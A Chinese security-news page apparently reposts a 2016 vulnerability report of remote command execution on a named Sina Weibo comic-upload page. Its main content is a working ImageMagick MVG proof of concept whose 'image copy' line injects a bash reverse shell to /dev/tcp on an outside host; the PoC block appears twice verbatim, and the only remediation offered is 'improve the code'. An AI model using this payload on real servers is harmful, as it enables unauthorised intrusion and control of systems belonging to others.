频道栏目
首页 > 资讯 > 企业安全 > 正文

新浪微博某处远程命令执行漏洞(可反弹shell操作服务器)

16-07-19        来源:[db:作者]  
收藏   我要投稿

RT

来到这里http://manhua.weibo.com/space/upload_comic

上传poc

push graphic-context

viewbox 0 0 640 480

image copy 200,200 100,100 "|bash -i >& /dev/tcp/x.x.x.x/2334 0>&1"

pop graphic-context

 

123.png

 

反弹一波

 

22.png

 

来到这里http://manhua.weibo.com/space/upload_comic

上传poc

push graphic-context

viewbox 0 0 640 480

image copy 200,200 100,100 "|bash -i >& /dev/tcp/x.x.x.x/2334 0>&1"

pop graphic-context

 

123.png

 

反弹一波

 

22.png

 

解决方案:

完善代码

相关TAG标签
上一篇:新浪微博某分站存在SQL注入(可UNION)
下一篇:格兰仕厂商协同平台认证绕过执行/root权限/已Shell
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站